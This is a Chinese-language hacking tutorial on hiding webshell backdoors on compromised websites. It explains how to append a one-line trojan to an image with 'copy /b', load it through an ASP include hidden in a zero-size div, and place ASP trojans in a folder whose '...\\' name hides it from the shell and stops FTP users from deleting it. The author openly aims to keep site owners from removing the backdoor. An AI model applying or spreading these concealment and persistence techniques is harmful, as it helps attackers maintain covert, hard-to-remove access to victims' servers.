打造隐藏的webshell两大方法

方法一：图片留Shell后门。

准备个一句话木马（改名为1.txt）和一张图片（1.jpg）图片，图片最好是采用被入侵的网站上的图片，因为等会要替换图片。

cmd下使用如下命令：
copy 图片.jpg/b+一句话.txt/b 3.jpg/b

合并成功后，我们传到它网站里， 把你做好的图片替换掉原来的图片。

然后随便找个asp文件，插入以下代码：

<div style=”height=0px; width=0px; overflow=hidden”><!– #include file=image/图片.jpg –></div>

这个代码就是调用图片，用css定义了一个大小为0的盒子，超出这个大小的话就隐藏显示

比如：创建一个llsilver.asp，同级目录下保存有绑定一句话的图片（就是我们合并得到的那个图片）
llsilver.asp 内容是:

<div style=”height=0px; width=0px; overflow=hidden”><!– #include file=image/图片.jpg –></div>

其中的【image/图片.jpg】就是llsilver.asp所在文件的文件夹image，图片.jpg就是我们合并得到的那个文件。

然后访问llsilver.asp这个文件的时候就等于访问一句话木马。

方法二：建立隐藏且无法删除的文件夹。

首先拿下shell后，建立一个有…\\这样的文件夹，比如我就在站点跟目录建立个jieshao…\\这样的文件夹，如图

直接确定，他会显示无法找到路径，如图

其实，这样的文件夹已经建好了，但是在windows下自动识别了为jieshao..这样的文件夹，而且在shell里是看不到此文件夹的，更别说删除了。不相信？我们用ie打开来看看

呵呵，的确有此目录哦，那么大家明白了吧，在shell里看不到这文件夹，我们不如在此文件夹上传个asp马，那样不就达到了很好的隐藏了么。

有2种方法，第一中直接copy到此文件夹里，但是要注意文件夹名一定是建立文件夹的名。OK。

copy完了，是不是觉得不对劲了，怎么copy到跟目录去了，呵呵，其实他已经copy到jieshao…\\这个文件下去了，不相信？我们在来看看。

呵呵，的确shell正常的copy进去了，在webshell里你是无法看到这个目录，也无法跳转到这个目录。
还有一种方法就是直接建立文件，比如我建立一个123.asp文件，直接jieshao…\\123.asp

有很多人会说，这种方法如果别人在ftp里，或者在服务器上能看见此文件夹么。
当然会了，但是他们无法访问、删除，这只是windows对文件夹识别的一种缺陷罢了。只能通过dos命名来删除和访问了，但是这只是服务器管理员才具有的权限。

好处：如果你日了某个站，比如一些站长买的一些空间，都是没有服务器权限的，只有ftp极小的权限那么你就可以利用这种方法了，他们进入FTP了也无法删除我们的后门，也无法访问。只能通知管理员了，如果再遇到傻B管理员，嘎嘎，貌似是很淫荡的方法！